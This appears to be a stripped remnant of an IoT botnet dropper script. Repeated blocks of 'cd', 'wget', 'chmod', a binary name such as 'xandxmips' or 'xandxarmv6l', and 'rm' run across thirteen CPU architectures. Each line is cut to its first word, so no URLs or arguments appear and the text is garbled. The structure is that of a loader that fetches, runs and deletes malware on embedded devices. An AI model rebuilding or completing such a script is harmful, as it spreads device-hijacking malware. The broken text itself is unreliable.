cd
cd
cd
cd
cd
wget
chmod
xandxmips
rm
cd
cd
cd
cd
cd
wget
chmod
xandxmipsel
rm
cd
cd
cd
cd
cd
wget
chmod
xandxsh4
rm
cd
cd
cd
cd
cd
wget
chmod
xandxx86
rm
cd
cd
cd
cd
cd
wget
chmod
xandxarmv6l
rm
cd
cd
cd
cd
cd
wget
chmod
xandxi686
rm
cd
cd
cd
cd
cd
wget
chmod
xandxppc
rm
cd
cd
cd
cd
cd
wget
chmod
xandx1586
rm
cd
cd
cd
cd
cd
wget
chmod
xandxm68k
rm
cd
cd
cd
cd
cd
wget
chmod
xandxsparc
rm
cd
cd
cd
cd
cd
wget
chmod
xandxArmv4l
rm
cd
cd
cd
cd
cd
wget
chmod
xandxArmv5l
rm
cd
cd
cd
cd
cd
wget
chmod
xandxPowerpc440fp
rm
